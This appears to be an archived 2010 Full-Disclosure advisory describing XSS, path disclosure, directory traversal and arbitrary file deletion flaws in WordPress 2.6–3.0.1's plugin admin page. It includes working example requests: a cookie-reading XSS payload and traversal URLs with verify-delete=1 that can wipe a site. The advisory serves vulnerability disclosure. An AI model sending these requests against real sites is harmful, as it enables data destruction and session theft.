lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri, 1 Oct 2010 22:06:45 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Multiple vulnerabilities in WordPress 2 and 3

Hello Full-Disclosure!

I want to warn you about Cross-Site Scripting, Full path disclosure,
Information Leakage, Directory Traversal, Arbitrary File Deletion and Denial
of Service vulnerabilities in WordPress.

For all these attacks it's needed to have access to admin account, or to
have account with rights for working with plugins. Or to attack admin or
other user with required rights via XSS, to find out token which designed to
protect against CSRF attacks.

So users of WordPress don't need to worry much about these holes (if to not
allow above-mentioned requirements). But these vulnerabilities will come in
useful to security researchers at access to admin panel or at existence of
XSS at the site. So it's better for WP developers to fix them.

-------------------------
Affected products:
-------------------------

Checked in WordPress 2.0.11, 2.6.2, 2.7, 2.8, 2.9.2, 3.0.1. Versions 2.0.х
are not vulnerable, because they have not such functionality. Vulnerable to
different vulnerabilities are WordPress 2.6 - 3.0.1 and potentially previous
versions.

----------
Details:
----------

While commenting XSS vulnerability in WordPress 3.0.1
(http://www.securityfocus.com/archive/1/513250), I mentioned additional
information concerning XSS vulnerability. These nuances concern and to
below-mentioned vulnerabilities. It's possible to attack as via parameter
checked[0], as via checked[1] and so on, and also via checked[]. In versions
WP 2.7 and higher it's possible to use parameter action=delete-selected, and
in versions 2.8 and higher it's also possible to use parameter
action2=delete-selected.

XSS (WASC-08):

As I pointed out in above-mentioned letter, in WordPress 2.6.x Cross-Site
Scripting attack is conducting differently. And there is almost no benefit
from this XSS.

For attack it's needed to send POST request to
http://site/wp-admin/plugins.php with parameters _wpnonce equal token's
value, delete-selected equal "Delete" and checked[] equal <body
onload=alert(document.cookie)>.

Vulnerable are WordPress 2.6.x and potentially previous versions.

Full path disclosure (WASC-13):

For attack it's needed to send POST request to
http://site/wp-admin/plugins.php with parameters _wpnonce equal token's
value, delete-selected equal "Delete" and checked[] equal "1".

Vulnerable are WordPress 2.6.x and potentially previous versions.

Full path disclosure (WASC-13):

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=1

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=1

Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and
higher).

Full path disclosure (WASC-13):

http://site/wp-admin/plugins.php

Full path is shown at page with plugins.

Vulnerable are WordPress 2.6 - 2.7.1.

Information Leakage (WASC-13) + Directory Traversal (WASC-33):

At page (in list under the link "Click to view entire list of files which
will be deleted") the list of files in current folder and subfolders is
shown.

In folder http://site/wp-content/plugins/:

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=

In folder http://site/wp-content/:

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1

http://site/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1

Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and
higher). And also WordPress 2.6.х. In versions 2.6.х it's needed to send
appropriate POST request to http://site/wp-admin/plugins.php (as mentioned
above).

Arbitrary File Deletion (WASC-42) + DoS (WASC-10):

If to send above-mentioned request with parameter verify-delete=1, then it's
possible to delete files and folders in current folder and subfolders.
Taking into account Directory Traversal it's possible to delete as all
plugins, as all other files in other folders, including it's possible to
conduct DoS attack on the site (if to delete important files of WP). E.g.
with request checked[]=../../1 it's possible to delete the whole site.

http://site/wordpress-2.9.2/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action=delete-selected&checked[]=../1&verify-delete=1

http://site/wordpress-2.9.2/wp-admin/plugins.php?_wpnonce=e0dc6c722b&action2=delete-selected&checked[]=../1&verify-delete=1

Vulnerable are WordPress 2.7 - 3.0.1 (for parameter action2 - 2.8 and
higher). And also WordPress 2.6.х. In versions 2.6.х it's needed to send
appropriate POST request to http://site/wp-admin/plugins.php (as mentioned
above).

------------
Timeline:
------------

2010.08.14 - found the vulnerabilities.
2010.09.30 - disclosed at my site. As I already wrote many times to security
mailing lists (http://www.securityfocus.com/archive/1/510274), starting from
2008 I never more inform WP developers about vulnerabilities in WordPress.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4575/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists